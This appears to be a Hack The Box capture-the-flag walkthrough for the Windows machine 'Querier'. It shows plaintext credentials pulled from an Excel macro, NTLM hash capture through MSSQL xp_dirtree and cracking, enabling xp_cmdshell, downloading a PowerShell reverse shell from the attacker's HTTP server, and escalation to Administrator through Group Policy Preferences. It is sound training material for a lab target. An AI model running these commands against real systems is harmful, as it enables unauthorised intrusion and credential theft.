Querier WriteupHow to solve HTB Querier
By Andrés Tirado | June 28, 2019
In my opinion,
is a great box.
By following the steps below
we will learn a bit about
(a widely used operating system) pentesting.
The challenge begins with a public
this is our first challenge level.
Next, we will work with
and we will need to use a special
to get the user hash.
Finally, we will take advantage of an insecure configuration
Group Policy Preferences in
to escalate to administrator privileges.
The first thing to do is check the connection
to the machine with a simple
We need a stable connection
with the box to make sure that
we will not lose all of our progress.
$ ping 10.10.10.125
Next, we can use
nmap to find open ports in the machine.
A simple port scanning is enough for our purposes.
$ nmap -Pn 10.10.10.125
We see 4 open ports (
and among these,
we found two interesting services,
microsoft-ds (SMB) in port
ms-sql-s in port
When we try to access via SMB,
it shows us a shared folder called
Report with a
the extension indicating a
Microsoft Excel Document.
Then we open the specified file with
Microsoft Excel and
a warning message appears telling us that
the file contains a suspicious macro.
We can explore the macro code in
using the option
Visual Basic in the Developer Tab.
The macro has an insecure configuration
of a connection to
the credentials are in plain text and now we can use them.
It’s a good example of something
that we should never do.
Now we can connect to the other interesting service
that we found:
We use the module
to do queries to the server interactively
using the credentials found in the last step,
for example a query to know the version of
like the first testing query.
$ mssqlclient.py -windows-auth QUERIER/reporting:PcwTWTHRwryjc\[email protected]
We will use this service to gain system access,
as a user without privileges.
We mount an
SMB server in our machine
to capture the authentication of any Windows user,
in this case, the user that executes the service
We tell it to enter our share
to capture its
NTLMv2 hash with an
This stored procedure of
will access our
to display a list of every folder,
every subfolder, and every file.
> EXEC master.sys.xp_dirtree '\\10.10.15.1\querier';
$ smbserver.py -smb2support querier Documents/
Then we copy the hash to a plain text file and
John the Ripper with the dictionary
to crack the captured hash.
We need to specify the correct hash format because
John the Ripper occasionally recognizes your hashes as the wrong type.
This is inevitable because
some hashes look identical,
in this case the correct format for
$ john.exe --wordlist=rockyou.txt --format-netntlmv2 \\ "\Users\dette\HackTheBox\Querier\hash_mssql-svc.txt"
Now we can connect to
SQL Server as user
We try to execute the command
it responds telling us that
xp_cmdshell is blocked.
Since we are the service administrator,
we can enable it using a few queries.
$ python mssqlclient.py -windows-auth QUERIER/mssql-svc:[email protected]
> EXEC sp_configure 'show advanced options', 1; > EXEC sp_configure reconfigure; > EXEC sp_configure 'xp_cmdshell', 1; > EXEC sp_configure reconfigure; > EXEC master.dbo.xp_cmdshell 'whoami';
Because we can execute commands, reading the user flag is now possible.
This method of executing commands
may be an inconvenient way to escalate privileges,
so we will upload a shell to the server.
To do this we will use the script
Before uploading the shell
we add our IP address and
some free port to make the connection.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.1 -Port 30000
Then it is necessary to start an
HTTP server in our machine.
We can do it with
$ python -m http.server
To make the server download our file,
we can use
Powershell as follows.
> EXEC master.dbo.xp_cmdshell 'powershell.exe \\ Invoke-WebRequest http://10.10.15.1:8000/Invoke-PowerShellTcp.ps1 \\ -OutFile c:\Users\mssql-svc\Music\Invoke-PowerShellTcp.ps1';
Now to get an interactive shell
we set our machine to listen
port 30000 and
execute the script in the
$ nc -lvp 30000
> EXEC master.dbo.xp_cmdshell 'powershell.exe \\ c:\Users\mssql-svc\Music\Invoke-PowerShellTcp.ps1';
At this point we use the module
PowerSploit collection to scan the system
to find a way to escalate privileges.
We can use the same method as in the last step.
We upload the file to the server with
To execute the script we need to import it first,
next we can run all checks
with the command
It will output any identifiable vulnerabilities
along with specifications for any abuse functions.
> Import-Module C:\Users\mssql-svc\Music\PowerUp.ps1 > Invoke-AllChecks
We can see the Administrator credentials
in plain text in the script output.
The script took advantage
of an insecure configuration
Group Policy Preferences of
it saves credentials with weak encryptions.
It’s time to prove these and
to obtain the root flag.
Finally, we can get an interactive shell
as Administrator with
With this, we can read the root flag.
$ python psexec.py QUERIER/Administrator:[email protected]
Another way to get the root flag could be to find the file
using a native tool like
decrypt the password using
gpp-decrypt tool of
In this challenge,
we saw some insecure configurations
such as saved credentials in plain text in code.
We also learned how to start an
in our machine to capture hashes and
finally, we learned and used some important tools
for pentesting in